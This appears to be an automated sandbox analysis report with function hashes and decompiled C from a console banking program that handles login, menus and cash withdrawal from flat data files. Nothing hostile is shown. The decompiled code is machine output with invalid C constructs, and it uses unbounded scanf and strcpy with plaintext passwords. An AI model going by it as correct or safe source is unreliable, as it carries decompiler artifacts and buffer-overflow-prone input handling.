Uniqueness

Uniqueness Score: -1.00%

Function 01459730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73312cc87b0854b86d6fc4c58ca32694a31b8f1477c8b0f40f566e322e3fedde
Instruction ID: d9f3b575456c4d485ef38eb2effb6a9e9bd7a56b47ab9f4a7b0232cd2a116b58
Opcode Fuzzy Hash: 73312cc87b0854b86d6fc4c58ca32694a31b8f1477c8b0f40f566e322e3fedde
Instruction Fuzzy Hash: 2D900261B0500802D140719A54187060019A7D0245F51D012A0414555DCBA98A5576E2

Uniqueness

Uniqueness Score: -1.00%

Function 01459FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2417fe76504b0fdc3144d406141f008a498f5d980f972869c7cfab4b3b53f89
Instruction ID: 2da7881ebe14bb094abdfabe9ce91b27fc50c1a813d84caa31e7f3da5077b1b8
Opcode Fuzzy Hash: a2417fe76504b0fdc3144d406141f008a498f5d980f972869c7cfab4b3b53f89
Instruction Fuzzy Hash: 8690027171114802D110619A84047060009A7D1245F51C412A0C14559DCBE588917163

Uniqueness

Uniqueness Score: -1.00%

Function 0145A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fa424175ae429e871a5131bd3b461eee6a28bb3bce4e41a5813a355ed761d2
Instruction ID: 5d14b78b9251cabaff119d3c54ae4679afcf18cf33fb09a0b85a0e2bc0bb987a
Opcode Fuzzy Hash: 80fa424175ae429e871a5131bd3b461eee6a28bb3bce4e41a5813a355ed761d2
Instruction Fuzzy Hash: 7B90027170144402D140719A844460B5009B7E0345F51C412E0815555CCB658856A262

Uniqueness

Uniqueness Score: -1.00%

Function 01459650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1fadcc0e36d8f7c00ab522d1f912efbd179f68cd3c0caf48c5a3f09ab21356
Instruction ID: ef792edf7c024c0fb351f0bb8ad8f6d5ec513934f34e5a312f96de88db5cebe0
Opcode Fuzzy Hash: 2c1fadcc0e36d8f7c00ab522d1f912efbd179f68cd3c0caf48c5a3f09ab21356
Instruction Fuzzy Hash: 7C90027170504C42D140719A4404A460019A7D0349F51C012A0454695DDB758D55B6A2

Uniqueness

Uniqueness Score: -1.00%

Function 01459610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a2415c1440b01d2027dd59dc93c4156aea07950f108eab7f6fdfd72211a167
Instruction ID: 3dd186cdac4a245dd74bde7b57ef713a4207e6e1c40bc3a716dec581a92e9959
Opcode Fuzzy Hash: d2a2415c1440b01d2027dd59dc93c4156aea07950f108eab7f6fdfd72211a167
Instruction Fuzzy Hash: 21900271B0500C02D150719A44147460009A7D0345F51C012A0414655DCBA58A5576E2

Uniqueness

Uniqueness Score: -1.00%

Function 01459A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9389228791720dcfa3199e723f4797c30ba7ccdf058367816895e3e8ff2838
Instruction ID: 7f0b466027a543e0a5047672a1827a5077bd02a69c4f4a0c694a4bdaed287b10
Opcode Fuzzy Hash: ac9389228791720dcfa3199e723f4797c30ba7ccdf058367816895e3e8ff2838
Instruction Fuzzy Hash: 4E90027170140802D100619A48087470009A7D0346F51C012A5554556ECBB5C8917572

Uniqueness

Uniqueness Score: -1.00%

Function 014596D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b419149d1a325230396affc9913c516fd5c8d787c8ce766fbbee731b19d3352d
Instruction ID: b7abda3ea0a766ec52be8c175abc3487826bf2518b44c5421af43b887eaa9976
Opcode Fuzzy Hash: b419149d1a325230396affc9913c516fd5c8d787c8ce766fbbee731b19d3352d
Instruction Fuzzy Hash: A290027170100C42D100619A4404B460009A7E0345F51C017A0514655DCB65C8517562

Uniqueness

Uniqueness Score: -1.00%

Function 01459A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0497066a9827c1f19f545c7d928678c0ab6a746a42e45288f1d5ab321de650
Instruction ID: aa14ad11b6ec66b621d68ed0ad91c0e68cad35625088db257d70100f0e1fe537
Opcode Fuzzy Hash: 9e0497066a9827c1f19f545c7d928678c0ab6a746a42e45288f1d5ab321de650
Instruction Fuzzy Hash: 7E90026170144842D140629A4804B0F4109A7E1246F91C01AA4546555CCE6588556762

Uniqueness

Uniqueness Score: -1.00%

Function 01459670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 65e4faa3bc8224ad97750209c411ec2ec1cec6a8ebcf6bb0630f7dcc033264e1
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00233C70, Relevance: 126.4, APIs: 47, Strings: 25, Instructions: 355
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00233C70(void* __fp0) {
				char _v5;
				int _v12;
				signed int _v16;
				int _v20;
				int _v24;
				char _v36;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v68;
				char _v80;
				char _v92;
				char _v124;
				char _v156;
				struct _IO_FILE* _t67;
				int _t69;
				int _t115;
				int _t116;
				struct _IO_FILE* _t126;
				void* _t140;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t157;
				void* _t174;

				_t174 = __fp0;
				_v68 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v12 = 0;
				_v20 = 0;
				_v20 = 0;
				do {
					E002310D0(0xa, 8, 0x46, 0xf);
					E00231000(7, 5);
					printf("Only THREE attempts shall be allowed to enter username and password.");
					E00231000(0x17, 0xa);
					printf("Enter User name : ");
					_push(0x23b244);
					scanf("%s");
					E00231000(0x17, 0xc);
					printf("Password        : ");
					E00231040( &_v68);
					strcpy(0x23b262,  &_v68);
					_t145 = _t140 + 0x1c;
					_v20 = _v20 + 1;
					if(_v20 == 3) {
						E002323F0( &_v68, _t174);
						E00231000(0x19, 0xa);
						printf(0x239cec);
						E00231000(0x16, 0xc);
						printf("Press ENTER to exit the program...");
						_t145 = _t145 + 8;
						exit(0);
					}
					_v12 = 0;
					_t67 = fopen("USER.DAT", "r");
					_t146 = _t145 + 8;
					 *0x23b288 = _t67;
					while(1) {
						_t126 =  *0x23b288; // 0x0
						_t69 = fscanf(_t126, "%s %s %s\n",  &_v92,  &_v124,  &_v156);
						_t147 = _t146 + 0x14;
						if(_t69 == 0xffffffff) {
							break;
						}
						strcpy( &_v124, _strupr( &_v124));
						strcpy( &_v156, _strupr( &_v156));
						strcpy(0x23b244, _strupr(0x23b244));
						strcpy(0x23b262, _strupr(0x23b262));
						_t115 = strcmp(0x23b244,  &_v124);
						_t146 = _t147 + 0x38;
						if(_t115 == 0) {
							_t116 = strcmp(0x23b262,  &_v156);
							_t146 = _t146 + 8;
							if(_t116 == 0) {
								_v12 = _v12 + 1;
								strcpy(0x23b240,  &_v92);
								_t146 = _t146 + 8;
							}
						}
					}
					_t127 =  *0x23b288; // 0x0
					fclose(_t127);
					_t148 = _t147 + 4;
					E002323F0(_t127, _t174);
					if(_v12 == 0) {
						goto L10;
					}
					break;
					L10:
					E00231000(0xa, 0xa);
					printf(0x239d4c);
					_t140 = _t148 + 4;
				} while (1 != 0);
				__imp___strtime( &_v80);
				_t149 = _t148 + 4;
				E002341D0(_t174);
				do {
					E002323F0(_t127, _t174);
					E00231000(0xf, 8);
					printf("1. Create New Account\n");
					E00231000(0xf, 0xa);
					printf("2. Cash Deposit");
					E00231000(0xf, 0xc);
					printf("3. Cash Withdrawl");
					E00231000(0xf, 0xe);
					printf("4. Fund Transfer");
					E00231000(0xf, 0x10);
					printf("5. Account information");
					E00231000(0x2d, 8);
					printf("6. Transaction information");
					E00231000(0x2d, 0xa);
					printf("7. Log out");
					E00231000(0x2d, 0xc);
					printf("8. Exit");
					_t157 = _t149 + 0x20;
					E00231000(1, 0x11);
					_v24 = 0;
					while(_v24 < 0x4e) {
						printf("_");
						_t157 = _t157 + 4;
						_t127 = _v24 + 1;
						_v24 = _v24 + 1;
					}
					E00231000(0x17, 0x13);
					printf("Press a choice between the range [1-8] ");
					_t149 = _t157 + 4;
					_v16 = 0x30;
					_v16 = _v16 - 1;
					if(_v16 > 7) {
						E002323F0(_t127, _t174);
						E00231000(0xa, 0xa);
						printf("Your input is out of range! Enter a choice between 1 to 8!");
						E00231000(0xf, 0xc);
						printf("Press any key to return to main menu...");
						_t149 = _t149 + 8;
					} else {
						switch( *((intOrPtr*)(_v16 * 4 +  &M002341A4))) {
							case 0:
								E00234510(_t127, _t174);
								goto L35;
							case 1:
								__eax = E00234E40(__ecx, __fp0);
								goto L35;
							case 2:
								__eax = E002352E0(__ecx, __fp0);
								goto L35;
							case 3:
								__eax = E002358A0(__fp0);
								goto L35;
							case 4:
								__eax = E00236220(__ecx, __fp0);
								goto L35;
							case 5:
								__eax = E00236E00(__ecx, __edx, __fp0);
								goto L35;
							case 6:
								E002323F0(__ecx, __fp0) = E00231000(0xf, 0xa);
								__eax = printf("Are you sure you want to Log out? <Y/N> : ");
								__ecx = _v5;
								if(__ecx == 0x59) {
									L28:
									__eax =  &_v36;
									_push( &_v36);
									__imp___strtime();
									__esp = __esp + 4;
									 *0x23b288 = fopen("LOG.DAT", "a");
									__ecx =  &_v36;
									_push( &_v36);
									__edx =  &_v80;
									_push( &_v80);
									_push(0x23b2a0);
									_push(0x23b240);
									__eax =  *0x23b288; // 0x0
									__eax = fprintf(__eax, "%s %s %s %s\n");
									__ecx =  *0x23b288; // 0x0
									fclose(__ecx) = E00233C70(__fp0);
								} else {
									__edx = _v5;
									if(_v5 == 0x79) {
										goto L28;
									}
								}
								goto L35;
							case 7:
								E002323F0(__ecx, __fp0) = E00231000(0xf, 0xa);
								__eax = printf("Are you sure you want to exit? <Y/N> : ");
								__edx = _v5;
								if(_v5 == 0x59) {
									L32:
									__ecx =  &_v36;
									_push( &_v36);
									__imp___strtime();
									__esp = __esp + 4;
									 *0x23b288 = fopen("LOG.DAT", "a");
									__edx =  &_v36;
									_push( &_v36);
									__eax =  &_v80;
									_push( &_v80);
									_push(0x23b2a0);
									_push(0x23b240);
									__ecx =  *0x23b288; // 0x0
									__eax = fprintf(__ecx, "%s %s %s %s\n");
									__edx =  *0x23b288; // 0x0
									__eax = fclose(__edx);
									exit(0);
								} else {
									__eax = _v5;
									if(_v5 == 0x79) {
										goto L32;
									}
								}
								goto L35;
						}
					}
					L35:
				} while (1 != 0);
				return 1;
			}

APIs

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00233CC7
printf.MSVCRT ref: 00233CDE
scanf.MSVCRT ref: 00233CF1
printf.MSVCRT ref: 00233D08

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

strcpy.MSVCRT(0023B262,00000000,00000000), ref: 00233D23
printf.MSVCRT ref: 00233D4D
printf.MSVCRT ref: 00233D64
exit.MSVCRT ref: 00233D6F
fopen.MSVCRT ref: 00233D86
fscanf.MSVCRT ref: 00233DAF
_strupr.MSVCRT ref: 00233DC5
strcpy.MSVCRT(?,00000000), ref: 00233DD3
_strupr.MSVCRT ref: 00233DE2
strcpy.MSVCRT(?,00000000), ref: 00233DF3
_strupr.MSVCRT ref: 00233E00
strcpy.MSVCRT(0023B244,00000000), ref: 00233E0F
_strupr.MSVCRT ref: 00233E1C
strcpy.MSVCRT(0023B262,00000000), ref: 00233E2B
strcmp.MSVCRT ref: 00233E3C
strcmp.MSVCRT ref: 00233E54
strcpy.MSVCRT(0023B240,?), ref: 00233E72
fclose.MSVCRT ref: 00233E86
printf.MSVCRT ref: 00233EA8
_strtime.MSVCRT ref: 00233EC6

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

printf.MSVCRT ref: 00233EE7
printf.MSVCRT ref: 00233EFE
printf.MSVCRT ref: 00233F15
printf.MSVCRT ref: 00233F2C
printf.MSVCRT ref: 00233F43
printf.MSVCRT ref: 00233F5A
printf.MSVCRT ref: 00233F71
printf.MSVCRT ref: 00233F88
printf.MSVCRT ref: 00233FB7

Part of subcall function 00234510: fopen.MSVCRT ref: 00234523
Part of subcall function 00234510: strcpy.MSVCRT(?,AC00001), ref: 00234546
Part of subcall function 00234510: fclose.MSVCRT ref: 002345BA
Part of subcall function 00234510: printf.MSVCRT ref: 002345D6
Part of subcall function 00234510: printf.MSVCRT ref: 0023460A
Part of subcall function 00234510: printf.MSVCRT ref: 00234623
Part of subcall function 00234510: scanf.MSVCRT ref: 00234638
Part of subcall function 00234510: scanf.MSVCRT ref: 0023464D
Part of subcall function 00234510: printf.MSVCRT ref: 00234664
Part of subcall function 00234510: scanf.MSVCRT ref: 00234676
Part of subcall function 00234510: printf.MSVCRT ref: 0023468D
Part of subcall function 00234510: scanf.MSVCRT ref: 0023469F

printf.MSVCRT ref: 00233FD0

Strings

8. Exit, xrefs: 00233F83
1. Create New Account, xrefs: 00233EE2
LOG.DAT, xrefs: 00234079
%s %s %s, xrefs: 00233DA3
Press any key to return to main menu..., xrefs: 00234185
USER.DAT, xrefs: 00233D81
4. Fund Transfer, xrefs: 00233F27
7. Log out, xrefs: 00233F6C
3. Cash Withdrawl, xrefs: 00233F10
LOG.DAT, xrefs: 0023410C
0, xrefs: 00233FD9
%s %s %s %s, xrefs: 00234131
5. Account information, xrefs: 00233F3E
%s %s %s %s, xrefs: 0023409E
Only THREE attempts shall be allowed to enter username and password., xrefs: 00233CC2
Are you sure you want to exit? <Y/N> : , xrefs: 002340DA
Your input is out of range! Enter a choice between 1 to 8!, xrefs: 0023416E
Password : , xrefs: 00233D03
Press ENTER to exit the program..., xrefs: 00233D5F
Press a choice between the range [1-8] , xrefs: 00233FCB
Enter User name : , xrefs: 00233CD9
N, xrefs: 00233FAC
2. Cash Deposit, xrefs: 00233EF9
6. Transaction information, xrefs: 00233F55
Are you sure you want to Log out? <Y/N> : , xrefs: 00234047

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcpy$scanf$_strupr$strcmp$_strdatefclosefopen$ConsoleCursorHandlePosition_strtimeexitfscanfisprint
String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
API String ID: 2431344561-1720101819
Opcode ID: ba4553742d3dd67085febd102f7ae3e0f1da767d7bda5f57265741755ff0e12f
Instruction ID: 6b5564cecfcb47dfbc9b1cf7231116b9122bbda7dca794eaf87452d12757114f
Opcode Fuzzy Hash: ba4553742d3dd67085febd102f7ae3e0f1da767d7bda5f57265741755ff0e12f
Instruction Fuzzy Hash: D4C18CF0E60305ABE714BBB4ED4BB9E36346F12705F040125FA0AB9191DEB166788F67

Uniqueness

Uniqueness Score: -1.00%

Function 002352E0, Relevance: 110.7, APIs: 41, Strings: 22, Instructions: 406
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E002352E0(void* __ecx, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v260;
				char _v340;
				char _v376;
				char _v456;
				struct _IO_FILE* _t90;
				struct _IO_FILE* _t95;
				int _t96;
				struct _IO_FILE* _t97;
				struct _IO_FILE* _t104;
				struct _IO_FILE* _t109;
				int _t110;
				struct _IO_FILE* _t111;
				int _t115;
				int _t132;
				struct _IO_FILE* _t134;
				struct _IO_FILE* _t139;
				int _t140;
				int _t150;
				struct _IO_FILE* _t154;
				int _t156;
				int _t161;
				int _t165;
				struct _IO_FILE* _t192;
				struct _IO_FILE* _t193;
				struct _IO_FILE* _t221;
				struct _IO_FILE* _t222;
				void* _t232;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t243;
				void* _t244;
				void* _t253;
				void* _t255;
				void* _t256;
				void* _t265;

				_t278 = __fp0;
				_v12 = 0;
				E002323F0(__ecx, __fp0);
				E00231000(5, 0xa);
				printf("Withdraw from A/C number          : ");
				_push( &_v28);
				scanf("%s");
				strcpy( &_v28, _strupr( &_v28));
				_t90 = fopen("ACCOUNT.DAT", "r");
				_t237 = _t232 + 0x20;
				 *0x23b288 = _t90;
				while(1) {
					_t95 =  *0x23b288; // 0x0
					_t96 = fscanf(_t95, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
					_t238 = _t237 + 0x38;
					if(_t96 == 0xffffffff) {
						break;
					}
					_t165 = strcmp( &_v28,  &_v208);
					_t237 = _t238 + 8;
					if(_t165 == 0) {
						_v12 = _v12 + 1;
						strcpy( &_v260,  &_v200);
						strcat( &_v260, " ");
						strcat( &_v260,  &_v170);
						_t237 = _t237 + 0x18;
					}
				}
				_t97 =  *0x23b288; // 0x0
				fclose(_t97);
				_t239 = _t238 + 4;
				__eflags = _v12;
				if(_v12 == 0) {
					E002323F0( &_v200, _t278);
					E00231000(0x14, 0xc);
					return printf("Given A/C number does not exits!");
				}
				E00231000(0x32, 0xa);
				_push( &_v260);
				printf("[ %s ]");
				E00231000(5, 0xc);
				printf("Amount to be Withdrawn (in NRs.)  : ");
				_push( &_v16);
				scanf("%f");
				_t104 = fopen("ACCOUNT.DAT", "r");
				_t243 = _t239 + 0x1c;
				 *0x23b288 = _t104;
				_v12 = 0;
				while(1) {
					_t109 =  *0x23b288; // 0x0
					_t110 = fscanf(_t109, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
					_t244 = _t243 + 0x38;
					__eflags = _t110 - 0xffffffff;
					if(_t110 == 0xffffffff) {
						break;
					}
					_t156 = strcmp( &_v208,  &_v28);
					_t243 = _t244 + 8;
					__eflags = _t156;
					if(__eflags == 0) {
						asm("movss xmm0, [ebp-0xc]");
						asm("comiss xmm0, [ebp-0x1c]");
						if(__eflags > 0) {
							E002323F0( &_v28, _t278);
							E00231000(0x14, 0xc);
							asm("cvtss2sd xmm0, [ebp-0x1c]");
							asm("movsd [esp], xmm0");
							printf("Sorry, the current balance is Rs. %.2f only!");
							E00231000(0x19, 0xe);
							_t161 = printf("Transaction NOT completed!");
							_v12 = 1;
							return _t161;
						}
					}
				}
				_t111 =  *0x23b288; // 0x0
				fclose(_t111);
				E002323F0( &_v200, _t278);
				E00231000(0x1e, 0xa);
				_t115 = printf("Confirm Transaction");
				asm("movss xmm0, [ebp-0xc]");
				asm("movss [esp], xmm0");
				E00231730(_t115,  &_v376);
				E00231000(3, 0xc);
				_push( &_v260);
				printf("%s to be Withdrawn from A/C number : %s [%s]");
				asm("cvtss2sd xmm0, [ebp-0xc]");
				asm("movsd [esp], xmm0");
				E00231A20( &_v456,  &_v376,  &_v28);
				strcpy( &_v340, "[In words : ");
				strcat( &_v340,  &_v456);
				strcat( &_v340, "]");
				E00231000(0x28 - (strlen( &_v340) >> 1), 0xe);
				puts( &_v340);
				E00231000(8, 0x11);
				_t132 = printf("Are you sure you want to perform this tranasction? <Y/N>");
				_t253 = _t244 + 0x14 - 8 + 0x24;
				__eflags = _v5 - 0x59;
				if(_v5 == 0x59) {
					L15:
					 *0x23b288 = fopen("ACCOUNT.DAT", "r");
					_t134 = fopen("TEMP.DAT", "w");
					_t255 = _t253 + 0x10;
					 *0x23b284 = _t134;
					_v12 = 0;
					while(1) {
						_t139 =  *0x23b288; // 0x0
						_t140 = fscanf(_t139, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
						_t256 = _t255 + 0x38;
						__eflags = _t140 - 0xffffffff;
						if(_t140 == 0xffffffff) {
							break;
						}
						_t150 = strcmp( &_v208,  &_v28);
						_t265 = _t256 + 8;
						__eflags = _t150;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("subss xmm0, [ebp-0xc]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [0x238110]");
						asm("comiss xmm0, [ebp-0x24]");
						if(__eflags > 0) {
							asm("movss xmm0, [ebp-0x20]");
							asm("addss xmm0, [ebp-0x24]");
							asm("movss [ebp-0x20], xmm0");
							asm("movss xmm0, [0x238110]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_t154 =  *0x23b284; // 0x0
						fprintf(_t154, "%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t255 = _t265 - 0xfffffffffffffff8 + 0x44;
					}
					_t192 =  *0x23b284; // 0x0
					fclose(_t192);
					_t221 =  *0x23b288; // 0x0
					fclose(_t221);
					 *0x23b288 = fopen("TRANSACTION.DAT", "a");
					__imp___strtime(0x23b290);
					_push(0x23b244);
					asm("cvtss2sd xmm0, [ebp-0xc]");
					asm("movsd [esp], xmm0");
					_push(0x23b290);
					_push(0x23b2a0);
					_push("Cash+Withdrawn");
					_push( &_v28);
					_t193 =  *0x23b288; // 0x0
					fprintf(_t193, "%s %s %s %s %.2f %s\n");
					_t222 =  *0x23b288; // 0x0
					fclose(_t222);
					E002323F0(_t193, _t278);
					E00231000(0x14, 0xc);
					return printf("Transaction completed successfully!");
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L15;
				}
				return _t132;
			}

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00235303
scanf.MSVCRT ref: 00235315
_strupr.MSVCRT ref: 00235322
strcpy.MSVCRT(?,00000000), ref: 00235330
fopen.MSVCRT ref: 00235342
fscanf.MSVCRT ref: 00235397
strcmp.MSVCRT ref: 002353B0
strcpy.MSVCRT(?,?), ref: 002353D3
strcat.MSVCRT(?,0023A770), ref: 002353E7
strcat.MSVCRT(?,?), ref: 002353FD
fclose.MSVCRT ref: 00235410
printf.MSVCRT ref: 00235432
printf.MSVCRT ref: 00235455
printf.MSVCRT ref: 0023546C
scanf.MSVCRT ref: 0023547E
fopen.MSVCRT ref: 00235491
fscanf.MSVCRT ref: 002354ED
strcmp.MSVCRT ref: 00235506
printf.MSVCRT ref: 0023553D
printf.MSVCRT ref: 00235554

Strings

Confirm Transaction, xrefs: 0023558B
ACCOUNT.DAT, xrefs: 0023533D
Amount to be Withdrawn (in NRs.) : , xrefs: 00235467
Given A/C number does not exits!, xrefs: 0023542D
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 002356FC
[In words : , xrefs: 002355EE
[ %s ], xrefs: 00235450
%s to be Withdrawn from A/C number : %s [%s], xrefs: 002355C7
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 002357D1
TRANSACTION.DAT, xrefs: 0023580F
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 002354E2
Transaction NOT completed!, xrefs: 0023554F
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00235665
Transaction completed successfully!, xrefs: 00235888
Sorry, the current balance is Rs. %.2f only!, xrefs: 00235538
TEMP.DAT, xrefs: 002356A6
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0023538C
ACCOUNT.DAT, xrefs: 0023548C
Cash+Withdrawn, xrefs: 0023584C
%s %s %s %s %.2f %s, xrefs: 00235855
Withdraw from A/C number : , xrefs: 002352FE
ACCOUNT.DAT, xrefs: 0023568E

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcmp$_strdatefopenfscanfscanfstrcatstrcpy$ConsoleCursorHandlePosition_struprfclose
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]$[In words :
API String ID: 3673828735-266188745
Opcode ID: 3a094f5da1e8ff8fa08ac76d95eb0bd046a2e9ab6f38127d66d378c874f09d90
